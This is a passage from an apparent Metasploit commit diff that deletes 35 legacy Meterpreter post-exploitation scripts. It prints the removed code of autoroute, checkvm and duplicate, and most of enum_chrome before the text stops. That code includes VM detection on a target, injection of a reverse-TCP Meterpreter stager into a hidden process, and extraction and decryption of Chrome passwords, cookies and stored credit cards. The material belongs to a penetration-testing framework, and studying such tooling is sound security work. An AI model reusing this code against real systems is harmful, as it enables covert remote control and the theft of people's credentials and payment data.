
delete meterpreter scripts with replacement post modules

Brent Cook 2 years ago
parent
commit
13b06db48e
35 changed files with 0 additions and 6560 deletions
  1. 0
    209
      scripts/meterpreter/autoroute.rb
  2. 0
    359
      scripts/meterpreter/checkvm.rb
  3. 0
    153
      scripts/meterpreter/duplicate.rb
  4. 0
    244
      scripts/meterpreter/enum_chrome.rb
  5. 0
    292
      scripts/meterpreter/enum_firefox.rb
  6. 0
    101
      scripts/meterpreter/enum_logged_on_users.rb
  7. 0
    132
      scripts/meterpreter/enum_powershell_env.rb
  8. 0
    104
      scripts/meterpreter/enum_putty.rb
  9. 0
    124
      scripts/meterpreter/enum_shares.rb
  10. 0
    87
      scripts/meterpreter/file_collector.rb
  11. 0
    70
      scripts/meterpreter/get_application_list.rb
  12. 0
    177
      scripts/meterpreter/get_filezilla_creds.rb
  13. 0
    35
      scripts/meterpreter/get_local_subnets.rb
  14. 0
    64
      scripts/meterpreter/get_valid_community.rb
  15. 0
    381
      scripts/meterpreter/getcountermeasure.rb
  16. 0
    190
      scripts/meterpreter/getgui.rb
  17. 0
    109
      scripts/meterpreter/getvncpw.rb
  18. 0
    306
      scripts/meterpreter/hashdump.rb
  19. 0
    108
      scripts/meterpreter/hostsedit.rb
  20. 0
    212
      scripts/meterpreter/keylogrecorder.rb
  21. 0
    619
      scripts/meterpreter/killav.rb
  22. 0
    139
      scripts/meterpreter/metsvc.rb
  23. 0
    96
      scripts/meterpreter/migrate.rb
  24. 0
    219
      scripts/meterpreter/packetrecorder.rb
  25. 0
    259
      scripts/meterpreter/persistence.rb
  26. 0
    195
      scripts/meterpreter/prefetchtool.rb
  27. 0
    196
      scripts/meterpreter/remotewinenum.rb
  28. 0
    394
      scripts/meterpreter/schelevator.rb
  29. 0
    84
      scripts/meterpreter/screen_unlock.rb
  30. 0
    158
      scripts/meterpreter/screenspy.rb
  31. 0
    107
      scripts/meterpreter/search_dwld.rb
  32. 0
    210
      scripts/meterpreter/service_permissions_escalate.rb
  33. 0
    149
      scripts/meterpreter/uploadexec.rb
  34. 0
    141
      scripts/meterpreter/webcam.rb
  35. 0
    137
      scripts/meterpreter/wmic.rb

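--- a/scripts/meterpreter/autoroute.rb
+++ b/scripts/meterpreter/autoroute.rb
@@ -1,209 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to improve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-#
-# Meterpreter script for setting up a route from within a
-# Meterpreter session, without having to background the
-# current session.
-
-# Default options
-session = client
-subnet = nil
-netmask = "255.255.255.0"
-print_only = false
-remove_route = false
-remove_all_routes = false
-
-# Options parsing
-@@exec_opts = Rex::Parser::Arguments.new(
-  "-h" => [false, "Help and usage"],
-  "-s" => [true, "Subnet (IPv4, for example, 10.10.10.0)"],
-  "-n" => [true, "Netmask (IPv4, for example, 255.255.255.0"],
-  "-p" => [false, "Print active routing table. All other options are ignored"],
-  "-d" => [false, "Delete the named route instead of adding it"],
-  "-D" => [false, "Delete all routes (does not require a subnet)"]
-)
-
-@@exec_opts.parse(args) { |opt, idx, val|
-  v = val.to_s.strip
-  case opt
-  when "-h"
-    usage
-    raise Rex::Script::Completed
-  when "-s"
-    if v =~ /[0-9\x2e]+\x2f[0-9]{1,2}/
-      subnet,cidr = v.split("\x2f")
-      netmask = Rex::Socket.addr_ctoa(cidr.to_i)
-    else
-      subnet = v
-    end
-  when "-n"
-    if (0..32) === v.to_i
-      netmask = Rex::Socket.addr_ctoa(v.to_i)
-    else
-      netmask = v
-    end
-  when "-p"
-    print_only = true
-  when "-d"
-    remove_route = true
-  when "-D"
-    remove_all_routes = true
-  end
-}
-
-def delete_all_routes
-  if Rex::Socket::SwitchBoard.routes.size > 0
-    routes = []
-    Rex::Socket::SwitchBoard.each do |route|
-      routes << {:subnet => route.subnet, :netmask => route.netmask}
-    end
-    routes.each {|route_opts| delete_route(route_opts)}
-
-    print_status "Deleted all routes"
-  else
-    print_status "No routes have been added yet"
-  end
-  raise Rex::Script::Completed
-end
-
-# Identical functionality to command_dispatcher/core.rb, and
-# nearly identical code
-def print_routes
-  if Rex::Socket::SwitchBoard.routes.size > 0
-    tbl =	Msf::Ui::Console::Table.new(
-      Msf::Ui::Console::Table::Style::Default,
-      'Header'  => "Active Routing Table",
-      'Prefix'  => "\n",
-      'Postfix' => "\n",
-      'Columns' =>
-        [
-          'Subnet',
-          'Netmask',
-          'Gateway',
-        ],
-      'ColProps' =>
-        {
-          'Subnet'  => { 'MaxWidth' => 17 },
-          'Netmask' => { 'MaxWidth' => 17 },
-        })
-    ret = []
-
-    Rex::Socket::SwitchBoard.each { |route|
-      if (route.comm.kind_of?(Msf::Session))
-        gw = "Session #{route.comm.sid}"
-      else
-        gw = route.comm.name.split(/::/)[-1]
-      end
-      tbl << [ route.subnet, route.netmask, gw ]
-    }
-      print tbl.to_s
-  else
-    print_status "No routes have been added yet"
-  end
-  raise Rex::Script::Completed
-end
-
-# Yet another IP validator. I'm sure there's some Rex
-# function that can just do this.
-def check_ip(ip=nil)
-  return false if(ip.nil? || ip.strip.empty?)
-  begin
-    rw = Rex::Socket::RangeWalker.new(ip.strip)
-    (rw.valid? && rw.length == 1) ? true : false
-  rescue
-    false
-  end
-end
-
-# Adds a route to the framework instance
-def add_route(opts={})
-  subnet = opts[:subnet]
-  netmask = opts[:netmask] || "255.255.255.0" # Default class C
-  Rex::Socket::SwitchBoard.add_route(subnet, netmask, session)
-end
-
-# Removes a route to the framework instance
-def delete_route(opts={})
-  subnet = opts[:subnet]
-  netmask = opts[:netmask] || "255.255.255.0" # Default class C
-  Rex::Socket::SwitchBoard.remove_route(subnet, netmask, session)
-end
-
-
-# Defines usage
-def usage()
-  print_status "Usage:   run autoroute [-r] -s subnet -n netmask"
-  print_status "Examples:"
-  print_status "  run autoroute -s 10.1.1.0 -n 255.255.255.0  # Add a route to 10.10.10.1/255.255.255.0"
-  print_status "  run autoroute -s 10.10.10.1                 # Netmask defaults to 255.255.255.0"
-  print_status "  run autoroute -s 10.10.10.1/24              # CIDR notation is also okay"
-  print_status "  run autoroute -p                            # Print active routing table"
-  print_status "  run autoroute -d -s 10.10.10.1              # Deletes the 10.10.10.1/255.255.255.0 route"
-  print_status "Use the \"route\" and \"ipconfig\" Meterpreter commands to learn about available routes"
-  print_error "Deprecation warning: This script has been replaced by the post/windows/manage/autoroute module"
-end
-
-# Validates the command options
-def validate_cmd(subnet=nil,netmask=nil)
-  if subnet.nil?
-    print_error "Missing -s (subnet) option"
-    return false
-  end
-
-  unless(check_ip(subnet))
-    print_error "Subnet invalid (must be IPv4)"
-    usage
-    return false
-  end
-
-  if(netmask and !(Rex::Socket.addr_atoc(netmask)))
-    print_error "Netmask invalid (must define contiguous IP addressing)"
-    usage
-    return false
-  end
-
-  if(netmask and !check_ip(netmask))
-    print_error "Netmask invalid"
-    return usage
-  end
-  true
-end
-
-if print_only
-  print_routes()
-  raise Rex::Script::Completed
-end
-
-if remove_all_routes
-  delete_all_routes()
-  raise Rex::Script::Completed
-end
-
-raise Rex::Script::Completed unless validate_cmd(subnet,netmask)
-
-if remove_route
-  print_status("Deleting route to %s/%s..." % [subnet,netmask])
-  route_result = delete_route(:subnet => subnet, :netmask => netmask)
-else
-  print_status("Adding a route to %s/%s..." % [subnet,netmask])
-  route_result = add_route(:subnet => subnet, :netmask => netmask)
-end
-
-if route_result
-  print_good "%s route to %s/%s via %s" % [
-    (remove_route ? "Deleted" : "Added"),
-    subnet,netmask,client.sock.peerhost
-  ]
-else
-  print_error "Could not %s route" % [(remove_route ? "delete" : "add")]
-end
-
-if Rex::Socket::SwitchBoard.routes.size > 0
-  print_status "Use the -p option to list all active routes"
-end
-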
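--- a/scripts/meterpreter/checkvm.rb
+++ b/scripts/meterpreter/checkvm.rb
@@ -1,359 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-# Meterpreter script for detecting if target host is a Virtual Machine
-# Provided by Carlos Perez at carlos_perez[at]darkoperator.com
-# Version: 0.2.0
-session = client
-
-@@exec_opts = Rex::Parser::Arguments.new(
-  "-h" => [ false,"Help menu." ]
-)
-
-@@exec_opts.parse(args) { |opt, idx, val|
-  case opt
-  when "-h"
-    print_line("CheckVM -- Check various attributes on the target for evidence that it is a virtual machine")
-    print_line("USAGE: run checkvm")
-    print_line(@@exec_opts.usage)
-    raise Rex::Script::Completed
-  end
-}
-
-# Function for detecting if it is a Hyper-V VM
-def hypervchk(session)
-  begin
-    vm = false
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft', KEY_READ)
-    sfmsvals = key.enum_key
-    if sfmsvals.include?("Hyper-V")
-      print_status("This is a Hyper-V Virtual Machine")
-      vm = true
-    elsif sfmsvals.include?("VirtualMachine")
-      print_status("This is a Hyper-V Virtual Machine")
-      vm = true
-    end
-    key.close
-  rescue
-  end
-
-  if not vm
-    begin
-      key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
-      srvvals = key.enum_key
-      if srvvals.include?("vmicheartbeat")
-        print_status("This is a Hyper-V Virtual Machine")
-        vm = true
-      elsif srvvals.include?("vmicvss")
-        print_status("This is a Hyper-V Virtual Machine")
-        vm = true
-      elsif srvvals.include?("vmicshutdown")
-        print_status("This is a Hyper-V Virtual Machine")
-        vm = true
-      elsif srvvals.include?("vmicexchange")
-        print_status("This is a Hyper-V Virtual Machine")
-        vm = true
-      end
-    rescue
-    end
-  end
-  return vm
-end
-
-# Function for checking if it is a VMware VM
-def vmwarechk(session)
-  vm = false
-  begin
-  key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
-  srvvals = key.enum_key
-  if srvvals.include?("vmdebug")
-    print_status("This is a VMware Virtual Machine")
-    vm = true
-  elsif srvvals.include?("vmmouse")
-    print_status("This is a VMware Virtual Machine")
-    vm = true
-  elsif srvvals.include?("VMTools")
-    print_status("This is a VMware Virtual Machine")
-    vm = true
-  elsif srvvals.include?("VMMEMCTL")
-    print_status("This is a VMware Virtual Machine")
-    vm = true
-  end
-  key.close
-  rescue
-  end
-  if not vm
-    begin
-      key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0')
-      if key.query_value('Identifier').data.downcase =~ /vmware/
-        print_status("This is a VMware Virtual Machine")
-        vm = true
-      end
-    rescue
-    end
-  end
-  if not vm
-    vmwareprocs = [
-      "vmwareuser.exe",
-      "vmwaretray.exe"
-    ]
-    vmwareprocs.each do |p|
-      session.sys.process.get_processes().each do |x|
-        if p == (x['name'].downcase)
-          print_status("This is a VMware Virtual Machine") if not vm
-          vm = true
-        end
-      end
-    end
-  end
-  key.close
-  return vm
-
-end
-# Function for checking if it is a Virtual PC VM
-def checkvrtlpc(session)
-  vm = false
-  vpcprocs = [
-    "vmusrvc.exe",
-    "vmsrvc.exe"
-  ]
-  vpcprocs.each do |p|
-    session.sys.process.get_processes().each do |x|
-      if p == (x['name'].downcase)
-        print_status("This is a VirtualPC Virtual Machine") if not vm
-        vm = true
-      end
-    end
-  end
-  if not vm
-    begin
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
-    srvvals = key.enum_key
-    if srvvals.include?("vpcbus")
-      print_status("This is a VirtualPC Virtual Machine")
-      vm = true
-    elsif srvvals.include?("vpc-s3")
-      print_status("This is a VirtualPC Virtual Machine")
-      vm = true
-    elsif srvvals.include?("vpcuhub")
-      print_status("This is a VirtualPC Virtual Machine")
-      vm = true
-    elsif srvvals.include?("msvmmouf")
-      print_status("This is a VirtualPC Virtual Machine")
-      vm = true
-    end
-    key.close
-    rescue
-    end
-  end
-  return vm
-end
-
-def vboxchk(session)
-  vm = false
-  vboxprocs = [
-    "vboxservice.exe",
-    "vboxtray.exe"
-  ]
-  vboxprocs.each do |p|
-    session.sys.process.get_processes().each do |x|
-      if p == (x['name'].downcase)
-        print_status("This is a Sun VirtualBox Virtual Machine") if not vm
-        vm = true
-      end
-    end
-  end
-  if not vm
-  begin
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\DSDT', KEY_READ)
-    srvvals = key.enum_key
-    if srvvals.include?("VBOX__")
-      print_status("This is a Sun VirtualBox Virtual Machine")
-      vm = true
-    end
-  rescue
-  end
-  end
-  if not vm
-    begin
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\FADT', KEY_READ)
-    srvvals = key.enum_key
-    if srvvals.include?("VBOX__")
-      print_status("This is a Sun VirtualBox Virtual Machine")
-      vm = true
-    end
-    rescue
-    end
-  end
-  if not vm
-    begin
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\RSDT', KEY_READ)
-    srvvals = key.enum_key
-    if srvvals.include?("VBOX__")
-      print_status("This is a Sun VirtualBox Virtual Machine")
-      vm = true
-    end
-    rescue
-    end
-  end
-  if not vm
-    begin
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0')
-    if key.query_value('Identifier').data.downcase =~ /vbox/
-      print_status("This is a Sun VirtualBox Virtual Machine")
-      vm = true
-    end
-    rescue
-    end
-  end
-  if not vm
-    begin
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DESCRIPTION\System')
-    if key.query_value('SystemBiosVersion').data.downcase =~ /vbox/
-      print_status("This is a Sun VirtualBox Virtual Machine")
-      vm = true
-    end
-    rescue
-    end
-  end
-  if not vm
-    begin
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
-    srvvals = key.enum_key
-    if srvvals.include?("VBoxMouse")
-      print_status("This is a Sun VirtualBox Virtual Machine")
-      vm = true
-    elsif srvvals.include?("VBoxGuest")
-      print_status("This is a Sun VirtualBox Virtual Machine")
-      vm = true
-    elsif srvvals.include?("VBoxService")
-      print_status("This is a Sun VirtualBox Virtual Machine")
-      vm = true
-    elsif srvvals.include?("VBoxSF")
-      print_status("This is a Sun VirtualBox Virtual Machine")
-      vm = true
-    end
-    key.close
-    rescue
-    end
-  end
-  return vm
-end
-
-def xenchk(session)
-  vm = false
-  xenprocs = [
-    "xenservice.exe"
-  ]
-  xenprocs.each do |p|
-    session.sys.process.get_processes().each do |x|
-      if p == (x['name'].downcase)
-        print_status("This is a Xen Virtual Machine") if not vm
-        vm = true
-      end
-    end
-  end
-  if not vm
-  begin
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\DSDT', KEY_READ)
-    srvvals = key.enum_key
-    if srvvals.include?("Xen")
-      print_status("This is a Xen Virtual Machine")
-      vm = true
-    end
-  rescue
-  end
-  end
-  if not vm
-    begin
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\FADT', KEY_READ)
-    srvvals = key.enum_key
-    if srvvals.include?("Xen")
-      print_status("This is a Xen Virtual Machine")
-      vm = true
-    end
-    rescue
-    end
-  end
-  if not vm
-    begin
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\RSDT', KEY_READ)
-    srvvals = key.enum_key
-    if srvvals.include?("Xen")
-      print_status("This is a Xen Virtual Machine")
-      vm = true
-    end
-    rescue
-    end
-  end
-  if not vm
-    begin
-    key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
-    srvvals = key.enum_key
-    if srvvals.include?("xenevtchn")
-      print_status("This is a Xen Virtual Machine")
-      vm = true
-    elsif srvvals.include?("xennet")
-      print_status("This is a Xen Virtual Machine")
-      vm = true
-    elsif srvvals.include?("xennet6")
-      print_status("This is a Xen Virtual Machine")
-      vm = true
-    elsif srvvals.include?("xensvc")
-      print_status("This is a Xen Virtual Machine")
-      vm = true
-    elsif srvvals.include?("xenvdb")
-      print_status("This is a Xen Virtual Machine")
-      vm = true
-    end
-    key.close
-    rescue
-    end
-  end
-  return vm
-end
-
-def qemuchk(session)
-  vm = false
-  if not vm
-    begin
-      key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0')
-      if key.query_value('Identifier').data.downcase =~ /qemu/
-        print_status("This is a QEMU/KVM Virtual Machine")
-        vm = true
-      end
-    rescue
-    end
-  end
-  if not vm
-    begin
-      key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DESCRIPTION\System\CentralProcessor\0')
-      if key.query_value('ProcessorNameString').data.downcase =~ /qemu/
-        print_status("This is a QEMU/KVM Virtual Machine")
-        vm = true
-      end
-    rescue
-    end
-  end
-
-  return vm
-
-end
-
-if client.platform =~ /win32|win64/
-  print_status("Checking if target is a Virtual Machine .....")
-  found = hypervchk(session)
-  found = vmwarechk(session) if not found
-  found = checkvrtlpc(session) if not found
-  found = vboxchk(session) if not found
-  found = xenchk(session) if not found
-  found = qemuchk(session) if not found
-  print_status("It appears to be physical host.") if not found
-else
-  print_error("This version of Meterpreter is not supported with this Script!")
-  raise Rex::Script::Completed
-end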
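--- a/scripts/meterpreter/duplicate.rb
+++ b/scripts/meterpreter/duplicate.rb
@@ -1,153 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-# Author: Scriptjunkie
-# Uses a meterpreter session to spawn a new meterpreter session in a different process.
-# A new process allows the session to take "risky" actions that might get the process killed by
-# A/V, giving a meterpreter session to another controller, or start a keylogger on another
-# process.
-#
-
-#
-# Options
-#
-opts = Rex::Parser::Arguments.new(
-  "-h"  => [ false,  "This help menu"],
-  "-r"  => [ true,   "The IP of a remote Metasploit listening for the connect back"],
-  "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4546)"],
-  "-w"  => [ false,  "Write and execute an exe instead of injecting into a process"],
-  "-e"  => [ true,   "Executable to inject into. Default notepad.exe, will fall back to spawn if not found."],
-  "-P"  => [ true,   "Process id to inject into; use instead of -e if multiple copies of one executable are running."],
-  "-s"  => [ false,  "Spawn new executable to inject to.  Only useful with -P."],
-  "-D"  => [ false,  "Disable the automatic exploit/multi/handler (use with -r to accept on another system)"]
-)
-
-#
-# Default parameters
-#
-
-rhost    = Rex::Socket.source_address("1.2.3.4")
-rport    = 4546
-lhost    = "127.0.0.1"
-
-spawn = false
-autoconn = true
-inject   = true
-target_pid = nil
-target    = "notepad.exe"
-pay      = nil
-
-#
-# Option parsing
-#
-opts.parse(args) do |opt, idx, val|
-  case opt
-  when "-h"
-    print_line(opts.usage)
-    raise Rex::Script::Completed
-  when "-r"
-    rhost = val
-  when "-p"
-    rport = val.to_i
-  when "-P"
-    target_pid = val.to_i
-  when "-e"
-    target = val
-  when "-D"
-    autoconn = false
-  when "-w"
-    inject = false
-  when "-s"
-    spawn = true
-  end
-end
-
-print_status("Creating a reverse meterpreter stager: LHOST=#{rhost} LPORT=#{rport}")
-
-payload = "windows/meterpreter/reverse_tcp"
-pay = client.framework.payloads.create(payload)
-pay.datastore['LHOST'] = rhost
-pay.datastore['LPORT'] = rport
-mul = client.framework.exploits.create("multi/handler")
-mul.share_datastore(pay.datastore)
-mul.datastore['WORKSPACE'] = client.workspace
-mul.datastore['PAYLOAD'] = payload
-mul.datastore['EXITFUNC'] = 'process'
-mul.datastore['ExitOnSession'] = true
-print_status("Running payload handler")
-mul.exploit_simple(
-  'Payload'  => mul.datastore['PAYLOAD'],
-  'RunAsJob' => true
-)
-
-if client.platform =~ /win32|win64/
-  server = client.sys.process.open
-
-  print_status("Current server process: #{server.name} (#{server.pid})")
-
-  if ! inject
-    exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
-    print_status("Meterpreter stager executable #{exe.length} bytes long")
-
-    #
-    # Upload to the filesystem
-    #
-    tempdir = client.sys.config.getenv('TEMP')
-    tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
-    tempexe.gsub!("\\\\", "\\")
-
-    fd = client.fs.file.new(tempexe, "wb")
-    fd.write(exe)
-    fd.close
-    print_status("Uploaded the agent to #{tempexe} (must be deleted manually)")
-
-    #
-    # Execute the agent
-    #
-    print_status("Executing the agent with endpoint #{rhost}:#{rport}...")
-    pid = session.sys.process.execute(tempexe, nil, {'Hidden' => true})
-  elsif ! spawn
-    # Get the target process name
-    print_status("Duplicating into #{target}...")
-
-    # Get the target process pid
-    if not target_pid
-      target_pid = client.sys.process[target]
-    end
-
-    if not target_pid
-      print_error("Could not access the target process")
-      print_status("Spawning a notepad.exe host process...")
-      note = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
-      target_pid = note.pid
-    end
-  else
-    print_status("Spawning a #{target} host process...")
-    newproc = client.sys.process.execute(target, nil, {'Hidden' => true })
-    target_pid = newproc.pid
-    if not target_pid
-      print_error("Could not create a process around #{target}")
-      raise Rex::Script::Completed
-    end
-  end
-
-  # Do the duplication
-  print_status("Injecting meterpreter into process ID #{target_pid}")
-  host_process = client.sys.process.open(target_pid, PROCESS_ALL_ACCESS)
-  raw = pay.generate
-  mem = host_process.memory.allocate(raw.length + (raw.length % 1024))
-
-  print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
-  print_status("Writing the stager into memory...")
-  host_process.memory.write(mem, raw)
-  host_process.thread.create(mem, 0)
-  print_status("New server process: #{target_pid}")
-
-else
-  print_error("This version of Meterpreter is not supported with this Script!")
-  raise Rex::Script::Completed
-end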
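--- a/scripts/meterpreter/enum_chrome.rb
+++ b/scripts/meterpreter/enum_chrome.rb
@@ -1,244 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-#
-# Script to extract data from a chrome installation.
-#
-# Author: Sven Taute <sven dot taute at gmail com>
-#
-
-require 'sqlite3'
-require 'yaml'
-
-if client.platform !~ /win32/
-  print_error("This version of Meterpreter is not supported with this Script!")
-  raise Rex::Script::Completed
-end
-@host_info = client.sys.config.sysinfo
-@chrome_files = [
-  { :in_file => "Web Data", :sql => "select * from autofill;", :out_file => "autofill"},
-  { :in_file => "Web Data", :sql => "SELECT username_value,origin_url,signon_realm FROM logins;", :out_file => "user_site"},
-  { :in_file => "Web Data", :sql => "select * from autofill_profiles;", :out_file => "autofill_profiles"},
-  { :in_file => "Web Data", :sql => "select * from credit_cards;", :out_file => "autofill_credit_cards", :encrypted_fields => ["card_number_encrypted"]},
-  { :in_file => "Cookies", :sql => "select * from cookies;", :out_file => "cookies"},
-  { :in_file => "History", :sql => "select * from urls;", :out_file => "url_history"},
-  { :in_file => "History", :sql => "SELECT url FROM downloads;", :out_file => "download_history"},
-  { :in_file => "History", :sql => "SELECT term FROM keyword_search_terms;", :out_file => "search_history"},
-  { :in_file => "Login Data", :sql => "select * from logins;", :out_file => "logins", :encrypted_fields => ["password_value"]},
-  { :in_file => "Bookmarks", :sql => nil, :out_file => "bookmarks.json"},
-  { :in_file => "Preferences", :sql => nil, :out_file => "preferences.json"},
-]
-@migrate = false
-@old_pid = nil
-@output_format = []
-
-opts = Rex::Parser::Arguments.new(
-  "-h" => [ false, "Help menu" ],
-  "-m" => [ false, "Migrate into explorer.exe"],
-  "-f" => [ true, "Output format: j[son], y[aml], t[ext]. Defaults to json"]
-)
-
-opts.parse(args) { |opt, idx, val|
-  case opt
-  when "-m"
-    @migrate = true
-  when "-f"
-    if val =~ /^j(son)?$/
-      @output_format << "json"
-    elsif val =~ /^y(aml)?$/
-      @output_format << "yaml"
-    elsif val =~ /^t(ext)?$/
-      @output_format << "text"
-    else
-      print_error("unknown format '#{val}'.")
-      raise Rex::Script::Completed
-    end
-  when "-h"
-    print_line("")
-    print_line("DESCRIPTION: Script for enumerating preferences and extracting")
-    print_line("information from the Google Chrome Browser on a target system.")
-    print_line("Decryption of creditcard information and passwords only supported")
-    print_line("on 32bit Windows Operating Systems.")
-    print_line("")
-    print_line("USAGE: run enum_chrome [-m]")
-    print_line(opts.usage)
-    raise Rex::Script::Completed
-  end
-}
-
-@output_format << "json" if @output_format.empty?
-if @output_format.include?("json")
-  begin
-    require 'json'
-  rescue LoadError
-    print_error("JSON is not available.")
-    @output_format.delete("json")
-    if @output_format.empty?
-      print_status("Falling back to raw text output.")
-      @output_format << "text"
-    end
-  end
-end
-print_status("using output format(s): " + @output_format.join(", "))
-
-def prepare_railgun
-  rg = client.railgun
-  if (!rg.get_dll('crypt32'))
-    rg.add_dll('crypt32')
-  end
-
-  if (!rg.crypt32.functions["CryptUnprotectData"])
-    rg.add_function("crypt32", "CryptUnprotectData", "BOOL", [
-        ["PBLOB","pDataIn", "in"],
-        ["PWCHAR", "szDataDescr", "out"],
-        ["PBLOB", "pOptionalEntropy", "in"],
-        ["PDWORD", "pvReserved", "in"],
-        ["PBLOB", "pPromptStruct", "in"],
-        ["DWORD", "dwFlags", "in"],
-        ["PBLOB", "pDataOut", "out"]
-      ])
-  end
-end
-
-def decrypt_data(data)
-  rg = client.railgun
-  pid = client.sys.process.open.pid
-  process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
-
-  mem = process.memory.allocate(1024)
-  process.memory.write(mem, data)
-
-  addr = [mem].pack("V")
-  len = [data.length].pack("V")
-  ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
-  len, addr = ret["pDataOut"].unpack("V2")
-  return "" if len == 0
-  decrypted = process.memory.read(addr, len)
-end
-
-def write_output(file, rows)
-  if @output_format.include?("json")
-    ::File.open(file + ".json", "w") { |f| f.write(JSON.pretty_generate(rows)) }
-  end
-  if @output_format.include?("yaml")
-    ::File.open(file + ".yml", "w") { |f| f.write(JSON.pretty_generate(rows)) }
-  end
-  if @output_format.include?("text")
-    ::File.open(file + ".txt", "w") do |f|
-      f.write(rows.first.keys.join("\t") + "\n")
-      f.write(rows.map { |e| e.values.map(&:inspect).join("\t") }.join("\n"))
-    end
-  end
-end
-
-def process_files(username)
-  @chrome_files.each do |item|
-    in_file = File.join(@log_dir, Rex::FileUtils.clean_path(username), item[:in_file])
-    out_file = File.join(@log_dir, Rex::FileUtils.clean_path(username), item[:out_file])
-    if item[:sql]
-      db = SQLite3::Database.new(in_file)
-      columns, *rows = db.execute2(item[:sql])
-      db.close
-      rows.map! do |row|
-        res = Hash[*columns.zip(row).flatten]
-        if item[:encrypted_fields] && client.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
-          if @host_info['Architecture'] !~ /x64/
-            item[:encrypted_fields].each do |field|
-              print_good("decrypting field '#{field}'...")
-              res[field + "_decrypted"] = decrypt_data(res[field])
-            end
-          else
-            print_error("Can not decrypt #{item[:out_file]}, decryption only supported in 32bit OS")
-          end
-        end
-        res
-      end
-      if rows.length > 0
-        print_status("writing output '#{item[:out_file]}'...")
-        write_output(out_file, rows)
-      else
-        print_status("no '#{item[:out_file]}' data found in file '#{item[:in_file]}'")
-      end
-    else
-      ::FileUtils.cp(in_file, out_file)
-    end
-  end
-end
-
-def extract_data(username)
-  chrome_path = @profiles_path + "\\" + username + @data_path
-  begin
-    client.fs.file.stat(chrome_path)
-  rescue
-    print_status("no files found for user '#{username}'")
-    return false
-  end
-
-  @chrome_files.map{ |e| e[:in_file] }.uniq.each do |f|
-    remote_path = chrome_path + '\\' + f
-    local_path = File.join(@log_dir, Rex::FileUtils.clean_path(username), f)
-    print_status("downloading file #{f} to '#{local_path}'...")
-    client.fs.file.download_file(local_path, remote_path)
-  end
-  return true
-end
-
-if @migrate
-  current_pid = client.sys.process.open.pid
-  target_pid = client.sys.process["explorer.exe"]
-  if target_pid != current_pid
-    @old_pid = current_pid
-    print_status("current PID is #{current_pid}. migrating into explorer.exe, PID=#{target_pid}...")
-    client.core.migrate(target_pid)
-    print_status("done.")
-  end
-end
-
-host = session.session_host
-@log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M"))
-::FileUtils.mkdir_p(@log_dir)
-
-sysdrive = client.sys.config.getenv('SYSTEMDRIVE')
-os = @host_info['OS']
-if os =~ /(Windows 7|2008|Vista)/
-  @profiles_path = sysdrive + "\\Users\\"
-  @data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
-elsif os =~ /(2000|NET|XP)/
-  @profiles_path = sysdrive + "\\Documents and Settings\\"
-  @data_path = "\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default"
-end
-
-usernames = []
-
-uid = client.sys.config.getuid
-
-if is_system?
-  print_status "running as SYSTEM, extracting user list..."
-  print_status "(decryption of passwords and credit card numbers will not be possible)"
-  client.fs.dir.foreach(@profiles_path) do |u|
-    usernames << u if u !~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
-  end
-  print_status "users found: #{usernames.join(", ")}"
-else
-  print_status "running as user '#{uid}'..."
-  usernames << client.sys.config.getenv('USERNAME')
-  prepare_railgun
-end
-
-usernames.each do |u|
-  print_status("extracting data for user '#{u}'...")
-  success = extract_data(u)
-  process_files(u) if success
-end
-
-if @migrate && @old_pid
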